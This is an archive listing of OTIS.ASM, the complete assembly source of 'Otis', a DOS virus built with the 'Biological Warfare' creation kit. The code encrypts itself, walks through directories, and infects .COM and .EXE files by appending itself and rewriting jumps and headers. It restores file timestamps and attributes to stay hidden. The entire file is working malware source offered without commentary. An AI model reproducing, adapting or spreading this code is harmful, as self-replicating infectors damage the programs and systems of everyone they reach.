home *** CD-ROM | disk | FTP | other *** search
/ HPAVC / HPAVC CD-ROM.iso / pc / BWUPDAT4.ZIP / MAYBERRY.ZIP / OTIS.ZIP / OTIS.ASM next >
Encoding:
Assembly Source File  |  1994-04-11  |  11.9 KB  |  389 lines
  1. ; otis : Otis (c) by HypoDermic!! Part of the Mayberry Family!!
  2. ; Created with Biological Warfare - Version 0.90ß by MnemoniX
  3.  
  4. PING            equ     0BF4Eh
  5. MARKER          equ     06864h
  6.  
  7. code            segment
  8.                 org     100h
  9.                 assume  cs:code,ds:code
  10.  
  11. start:
  12.                 db      0E9h,3,0          ; to virus
  13. host:
  14.                 db      0CDh,20h,0        ; host program
  15. virus_begin:
  16.  
  17.                 db      0BBh                    ; decryption module
  18. code_offset     dw      offset virus_code
  19.                 mov     cx,VIRUS_SIZE / 2 + 1
  20.  
  21. decrypt:
  22.                 db      02Eh,081h,07h           ; ADD CS:[BX]
  23. cipher          dw      0
  24.                 inc     bx
  25.                 inc     bx
  26.                 loop    decrypt
  27.  
  28.  
  29. virus_code:
  30.                 call    $ + 3             ; BP is instruction ptr.
  31.                 pop     bp
  32.                 sub     bp,offset $ - 1
  33.  
  34.                 push    ds es
  35.  
  36.                 push    cs
  37.                 pop     ds
  38.                 lea     dx,[bp + offset new_DTA]
  39.                 mov     ah,1Ah
  40.                 int     21h
  41.  
  42.                 push    [bp + exe_cs]
  43.                 push    [bp + exe_ip]
  44.                 push    [bp + exe_ss]
  45.                 push    [bp + exe_sp]
  46.                 call    traverse
  47.  
  48.                 pop     [bp + exe_sp]
  49.                 pop     [bp + exe_ss]
  50.                 pop     [bp + exe_ip]
  51.                 pop     [bp + exe_cs]
  52.                 pop     es ds
  53.                 mov     dx,80h
  54.                 mov     ah,1Ah
  55.                 int     21h
  56.  
  57.                 cmp     sp,MARKER               ; check for .EXE
  58.                 je      exe_exit
  59.  
  60. com_exit:
  61.                 lea     si,[bp + host]          ; restore host program
  62.                 mov     di,100h
  63.                 push    di
  64.                 movsw
  65.                 movsb
  66.  
  67.                 call    fix_regs                ; fix up registers
  68.                 ret                             ; and leave
  69. exe_exit:
  70.                 mov     ax,ds                   ; fix up return address
  71.                 add     ax,10h
  72.                 push    ax
  73.                 add     ax,cs:[bp + exe_cs]
  74.                 mov     cs:[bp + return_cs],ax
  75.  
  76.                 mov     ax,cs:[bp + exe_ip]
  77.                 mov     cs:[bp + return_ip],ax
  78.  
  79.                 pop     ax
  80.                 add     ax,cs:[bp + exe_ss]        ; restore stack
  81.                 cli
  82.                 mov     ss,ax
  83.                 mov     sp,cs:[bp + exe_sp]
  84.  
  85.                 call    fix_regs                ; fix up registers
  86.                 sti
  87.  
  88.                 db      0EAh                    ; back to host program
  89. return_ip       dw      0
  90. return_cs       dw      0
  91.  
  92. exe_cs          dw      -16                     ; orig CS:IP
  93. exe_ip          dw      103h
  94. exe_sp          dw      -2                      ; orig SS:SP
  95. exe_ss          dw      -16
  96.  
  97. fix_regs:
  98.                 xor     ax,ax
  99.                 cwd
  100.                 xor     bx,bx
  101.                 mov     si,100h
  102.                 xor     di,di
  103.                 xor     bp,bp
  104.                 ret
  105.  
  106.  
  107. traverse:
  108.                 sub     sp,64                   ; allocate stack space
  109.                 mov     si,sp
  110.                 inc     si
  111.                 mov     ah,47h                  ; get current directory
  112.                 xor     dl,dl
  113.                 push    ds
  114.                 push    ss
  115.                 pop     ds
  116.                 int     21h
  117.  
  118.                 pop     ds
  119.                 dec     si
  120.                 mov     byte ptr ss:[si],'\' ; fix directory
  121.  
  122. next_dir:
  123.                 call    infect_dir
  124.  
  125.                 lea     dx,[bp + outer]         ; repeat in next dir up
  126.                 mov     ah,3Bh
  127.                 int     21h
  128.                 jnc     next_dir
  129.  
  130. traverse_done:
  131.                 add     sp,64                   ; reset
  132.                 mov     dx,si
  133.                 push    ds
  134.                 push    ss
  135.                 pop     ds
  136.                 mov     ah,3Bh
  137.                 int     21h
  138.                 pop     ds
  139.                 ret
  140.  
  141. infect_dir:
  142.                 mov     ah,4Eh
  143.                 lea     dx,[bp + find_me]
  144.                 int     21h
  145.                 jc      infect_done
  146.  
  147. next_file:
  148.                 lea     dx,[bp + new_DTA + 1Eh]
  149.                 call    file_open
  150.                 mov     ah,4Fh
  151.                 int     21h
  152.                 jnc     next_file
  153.  
  154. infect_done:
  155.                 ret
  156.  
  157. file_open:
  158.                 push    ax cx di es
  159.                 call    get_extension
  160.                 cmp     [di],'OC'               ; .COM file?
  161.                 jne     perhaps_exe             ; perhaps .EXE then
  162.                 cmp     byte ptr [di + 2],'M'
  163.                 jne     not_prog
  164.                 jmp     a_program
  165. perhaps_exe:
  166.                 cmp     [di],'XE'               ; .EXE file?
  167.                 jne     not_prog
  168.                 cmp     byte ptr [di + 2],'E'
  169.                 jne     not_prog
  170. a_program:
  171.                 pop     es di cx ax
  172.                 jmp     execute                 ; infect file
  173. not_prog:
  174.                 pop     es di cx ax
  175.                 ret
  176.  
  177. execute:
  178.                 push    si
  179.  
  180.                 mov     ax,4300h                ; change attributes
  181.                 int     21h
  182.  
  183.                 push    cx dx ds
  184.                 xor     cx,cx
  185.                 call    set_attributes
  186.  
  187.                 mov     ax,3D02h                ; open file
  188.                 int     21h
  189.                 jc      cant_open
  190.                 xchg    bx,ax
  191.  
  192.                 mov     ax,5700h                ; save file date/time
  193.                 int     21h
  194.                 push    cx dx
  195.                 mov     ah,3Fh
  196.                 mov     cx,28
  197.                 lea     dx,[bp + read_buffer]
  198.                 int     21h
  199.  
  200.                 cmp     word ptr [bp + read_buffer],'ZM'
  201.                 je      infect_exe              ; yes, infect as .EXE
  202.  
  203.                 mov     al,2                    ; move to end of file
  204.                 call    move_file_ptr
  205.  
  206.                 sub     dx,VIRUS_SIZE + 3       ; check for previous infection
  207.                 cmp     dx,word ptr [bp + read_buffer + 1]
  208.                 je      dont_infect
  209.  
  210.                 add     dx,VIRUS_SIZE + 3
  211.                 mov     word ptr [bp + new_jump + 1],dx
  212.  
  213.                 add     dx,103h
  214.                 call    encrypt_code            ; encrypt virus
  215.  
  216.                 lea     dx,[bp + read_buffer]   ; save original program head
  217.                 int     21h
  218.                 mov     ah,40h                  ; write virus to file
  219.                 mov     cx,VIRUS_SIZE
  220.                 lea     dx,[bp + encrypt_buffer]
  221.                 int     21h
  222.  
  223.                 xor     al,al                   ; back to beginning of file
  224.                 call    move_file_ptr
  225.  
  226.                 lea     dx,[bp + new_jump]
  227.                 int     21h
  228.  
  229. fix_date_time:
  230.                 pop     dx cx
  231.                 mov     ax,5701h                ; restore file date/time
  232.                 int     21h
  233.  
  234. close:
  235.                 pop     ds dx cx                ; restore attributes
  236.                 call    set_attributes
  237.  
  238.                 mov     ah,3Eh                  ; close file
  239.                 int     21h
  240.  
  241. cant_open:
  242.                 pop     si
  243.                 ret
  244.  
  245.  
  246. set_attributes:
  247.                 mov     ax,4301h
  248.                 int     21h
  249.                 ret
  250.  
  251. dont_infect:
  252.                 pop     cx dx                   ; can't infect, skip
  253.                 jmp     close
  254.  
  255. move_file_ptr:
  256.                 mov     ah,42h                  ; move file pointer
  257.                 cwd
  258.                 xor     cx,cx
  259.                 int     21h
  260.  
  261.                 mov     dx,ax                   ; set up registers
  262.                 mov     ah,40h
  263.                 mov     cx,3
  264.                 ret
  265. infect_exe:
  266.                 cmp     word ptr [bp + read_buffer + 16],MARKER
  267.                 je      dont_infect             ; infected already
  268.  
  269.                 les    ax,dword ptr [bp + read_buffer + 20]
  270.                 mov    [bp + exe_cs],es
  271.                 mov    [bp + exe_ip],ax
  272.                 les    ax,dword ptr [bp + read_buffer + 14]
  273.                 mov    [bp + exe_ss],ax
  274.                 mov    [bp + exe_sp],es
  275.                 mov    word ptr [bp + read_buffer + 16],MARKER
  276.                 mov     ax,4202h                ; to end of file
  277.                 cwd
  278.                 xor     cx,cx
  279.                 int     21h
  280.  
  281.                 push    ax dx                   ; save file size
  282.  
  283.                 push    bx
  284.                 mov     cl,12                   ; calculate offsets for CS
  285.                 shl     dx,cl                   ; and IP
  286.                 mov     bx,ax
  287.                 mov     cl,4
  288.                 shr     bx,cl
  289.                 add     dx,bx
  290.                 and     ax,15
  291.                 pop     bx
  292.  
  293.                 sub    dx,word ptr [bp + read_buffer + 8]
  294.                 mov    word ptr [bp + read_buffer + 22],dx
  295.                 mov    word ptr [bp + read_buffer + 20],ax
  296.                 add    dx,100h
  297.                 mov    word ptr [bp + read_buffer + 14],dx
  298.  
  299.                 pop     dx ax                   ; calculate prog size
  300.  
  301.                 add     ax,VIRUS_SIZE
  302.                 adc     dx,0
  303.                 mov     cx,512                  ; in pages
  304.                 div     cx                      ; then save results
  305.                 inc     ax
  306.                 mov     word ptr [bp + read_buffer + 2],dx
  307.                 mov     word ptr [bp + read_buffer + 4],ax
  308.                 mov     dx,word ptr [bp + read_buffer + 20]
  309.                 call    encrypt_code            ; encrypt virus
  310.  
  311.  
  312.                 mov     ah,40h
  313.                 mov     cx,VIRUS_SIZE + 3
  314.                 lea     dx,[bp + encrypt_buffer]
  315.                 int     21h
  316.  
  317.  
  318.                 mov     ax,4200h                ; back to beginning
  319.                 cwd
  320.                 xor     cx,cx
  321.                 int     21h
  322.  
  323.                 mov     ah,40h                  ; and fix up header
  324.                 mov     cx,28
  325.                 lea     dx,[bp + read_buffer]
  326.                 int     21h
  327.                 jmp     fix_date_time           ; done
  328.  
  329. courtesy_of     db      '[BW]',0
  330. signature       db      'Otis (c) by HypoDermic!! Part of the Mayberry Family!!',0
  331.  
  332.  
  333. encrypt_code:
  334.                 push    ax cx
  335.  
  336.                 push    dx
  337.                 xor     ah,ah                   ; get time for random number
  338.                 int     1Ah
  339.  
  340.                 mov    [bp + cipher],dx
  341.                 pop     cx
  342.                 add     cx,virus_code - virus_begin
  343.                 mov     [bp + code_offset],cx
  344.                 push    cs                      ; ES = CS
  345.                 pop     es
  346.  
  347.                 lea     si,[bp + virus_begin]
  348.                 lea     di,[bp + offset encrypt_buffer]
  349.                 mov     cx,virus_code - virus_begin
  350.                 rep     movsb
  351.  
  352.                 mov     cx,VIRUS_SIZE / 2 + 1
  353. encrypt:
  354.                 lodsw                           ; encrypt virus code
  355.                 sub     ax,dx
  356.                 stosw
  357.                 loop    encrypt
  358.  
  359.                 pop     cx ax
  360.                 ret
  361.  
  362. get_extension:
  363.                 push    ds                      ; find extension
  364.                 pop     es
  365.                 mov     di,dx
  366.                 mov     cx,64
  367.                 mov     al,'.'
  368.                 repnz   scasb
  369.                 ret
  370.  
  371. find_me         db      '*.*',0
  372. outer           db      '..',0
  373.  
  374. new_jump        db      0E9h,0,0
  375.  
  376. infections      db      0
  377. virus_end:
  378. VIRUS_SIZE      equ     virus_end - virus_begin
  379. read_buffer     db      28 dup (?)              ; read buffer
  380. new_DTA         db      128 dup(?)
  381. encrypt_buffer  db      VIRUS_SIZE dup (?)      ; encryption buffer
  382.  
  383. end_heap:
  384.  
  385. MEM_SIZE        equ     end_heap - start
  386.  
  387. code            ends
  388.                 end     start
  389.